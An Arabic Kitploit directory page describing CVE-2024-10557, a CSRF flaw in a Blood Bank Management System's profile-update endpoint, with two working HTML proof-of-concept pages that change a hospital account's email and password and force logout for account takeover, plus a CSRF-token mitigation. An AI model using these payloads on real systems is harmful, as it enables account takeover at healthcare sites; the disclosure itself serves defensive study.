Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bevennyamande/cve-2024-10557
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbevennyamande/cve-2024-10557

CVE-2024-10557

إثبات مفهوم CSRF لتحديث ملف تعريف مستشفى يؤدي إلى الاستيلاء على الحساب

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإصدار المتأثر:

  • نظام إدارة بنك الدم: 1.0

معلومات الثغرة:

  • نوع الثغرة: تزوير الطلب عبر المواقع (CSRF)
  • الخطورة: عالية
  • الحالة: غير مصححة

النقطة الضعيفة:

  • المسار: /file/updateprofile.php

وصف الثغرة:

توجد ثغرة CSRF في هذه النقطة /file/updateprofile.php تسمح لمستخدم عن بعد بتحديث تفاصيل مستخدم مستشفى ويمكن أن تؤدي إلى الاستيلاء على الحساب حيث يمكن للمهاجم تحديث جميع المعلومات من البريد الإلكتروني إلى كلمة المرور مما يزيد فعليًا فرص الاستيلاء على الحساب.

يمكن أن يؤدي الاستغلال الناجح إلى إجراءات غير مصرح بها مثل حذف البيانات نيابة عن الضحية. بالإضافة إلى ذلك، يمكن استغلال ذلك من خلال زيارة مواقع ويب ضارة تحتوي على الحمولة.


إثبات المفهوم (PoC):

فيما يلي مثال على هجوم CSRF POC يقوم بتحديث تفاصيل ملف تعريف حساب مستشفى مسجل الدخول، استضف الملف على نطاق يتحكم فيه المهاجم في حالتي كنت أستخدم localhost:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with Logout Redirect</title>
</head>
<body>
    <h2>CSRF Proof of Concept with Chained Logout</h2>

    <!-- Form to exploit CSRF vulnerability for updating profile -->
    <form id="csrfForm" action="http://localhost.local/bloodbank/file/updateprofile.php" method="POST">
        <input type="hidden" name="hname" value="parirenyatwa">
        <input type="hidden" name="hemail" value="[email protected]">
        <input type="hidden" name="hpassword" value="pari1234">
        <input type="hidden" name="hphone" value="0777054000">
        <input type="hidden" name="hcity" value="harare">
        <input type="hidden" name="update" value="Update">
    </form>

    <script>
        // Submit the CSRF form to update profile
        document.getElementById("csrfForm").submit();
   </script>
</body>
</html>



إثبات المفهوم (POC) للاستيلاء على الحساب

  • يمكن للمهاجم تحديث تفاصيل الملف الشخصي بشكل فعال عن طريق التلاعب بالبريد الإلكتروني وكلمة المرور وإجبار logout CSRF وبالتالي تحقيق الاستيلاء على الحساب
root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with XMLHttpRequest</title>
</head>
<body>
    <h2>CSRF Proof of Concept with XMLHttpRequest and Redirect</h2>

    <script>
        // Define the target URLs for the CSRF attack
        const updateUrl = "http://localhost.local/bloodbank/file/updateprofile.php";
        const logoutUrl = "http://localhost.local/bloodbank/logout.php";

        // Data for the profile update CSRF request
        const updateData = "hname=parirenyatwa&hemail=pari%40hospital.co.zw&hpassword=pari1234&hphone=0777054000&hcity=harare&update=Update";

        // Function to send the XMLHttpRequest
        function sendCSRFUpdate() {
            const xhr = new XMLHttpRequest();
            xhr.open("POST", updateUrl, true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

            // When the request is complete, redirect to the logout page
            xhr.onload = function() {
                if (xhr.status === 200) {
                    console.log("Profile update CSRF request completed");
                    // Redirect to logout URL to log the victim out
                    window.location.href = logoutUrl;
                } else {
                    console.error("Profile update failed with status:", xhr.status);
                }
            };

            // Send the request with the update data
            xhr.send(updateData);
        }

        // Trigger the CSRF attack by sending the update request
        sendCSRFUpdate();
    </script>
</body>
</html>




التأثير:

  • التلاعب بالبيانات: يمكن للمهاجمين تعديل المحتوى المعروض للمستخدمين.
  • الضرر السمعة: قد يفقد المستخدمون الثقة في النظام بسبب السلوك الضار.

توصيات التخفيف:

  1. استخدام رمز CSRF قم بتنفيذ آلية لردع الوصول عبر النطاقات أو ضع csrf tokens في طلبك وتجنب أيضًا طلبات GET من إجراء تغييرات الحالة

تنزيل الأداة